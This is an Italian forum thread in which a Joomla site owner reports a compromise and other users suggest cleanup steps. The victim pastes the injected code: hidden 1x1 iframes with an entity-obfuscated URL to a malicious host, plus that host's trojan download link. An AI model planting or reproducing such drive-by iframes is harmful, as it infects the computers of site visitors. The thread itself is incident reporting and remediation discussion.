Carneade: cdpuvbhfzz.com!

[primomare]

Salve a tutti!
Sicuramente sono stato hakerato!
Sulla versione 1.0.15 oggi verso le 17.45 mi si sono scricchiate tutte le pagine del sito oltre la gallery su coppermine e il forum in phpbb.
All'inizio del codice mi ritrovo:

<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

facendomi scaricare necessariamente il seguente troiano:
http://cdpuvbhfzz.com/dl/adu598.php

Che fare...aiutatemi voi ..ho tutto offline!

[primomare]

Ragazzi non vi affrettate.... azzo!

Joomla mi sa tanto che fa acqua da tutti i lati.....o è già affondata---

[Kriss]

Ciao, hai un backup precedente per ripristinare tutto (compreso il db)? altrimenti puoi provare ad aprire i file del sito e controllare se trovi quell'iframe, cancellandolo...

Contatta anche il tuo servizio di hosting e avvisalo del misfatto

[honey82]

Io ho risolto scaricando il sito in locale e utilizzando il programma alias find and replace per eliminare il codice malicious. Successivamente ho effettualo l'upload sul server, cambiato la password per l'ftp e aggiornato la versione di joomla. Ah fai una bella scansione sul tuo pc per verificare che nn sia stato infettato prima di fare quanto ho suggerito.
Spero di esserti stato d'aiuto.

[primomare]

Innanzitutto grazie per la solidarietà e per la risposta!
Ho proveduto a togliere il sito poichè infettava anche i pc degli utenti....e onestamente non vorrei essere querelato...
Andiamo al danno!

Sulla directory principale non riesco a trovare un file che corronpe le pagine e inserisce iframe soprascritto.

Ho scaricato "find and replace" per eliminare il codice...ma forse non lo so fare funzionare ho provato ma l'ìframe rimane.

Che fare?

[Kriss]

Ciao, possibile che l'iframe si trovi nei file index, annidato al loro interno. Tuttavia se hai un backup "pulito" dovresti cercare di ricaricare quello!

[primomare]

Allora...
nonmi trovo purtroppo un file di backup.
Ho provato a sovrascrivere i file presenti nella directory principale (index.php, config...ecc) ma nulla il problema resta.

Mi chiedo allora..
Se reistallo tutto il pacchetto 1.0.15b rispettando ovviamente i parametri del database e non sovrascrivendolo riesco a ritornare al portale con i suoi articoli? Eventualmente riprenderei soltano i collagamenti alle immagini e ai contenuti swf.

Che ne dite?

[primomare]

No buono!

Mi sa tanto che risiede nel database! Sono inguaiato! HELPME!

[castosistemi]

anche io ho lo stesso problema il dominio dove risiende il mio spazio web joomlahost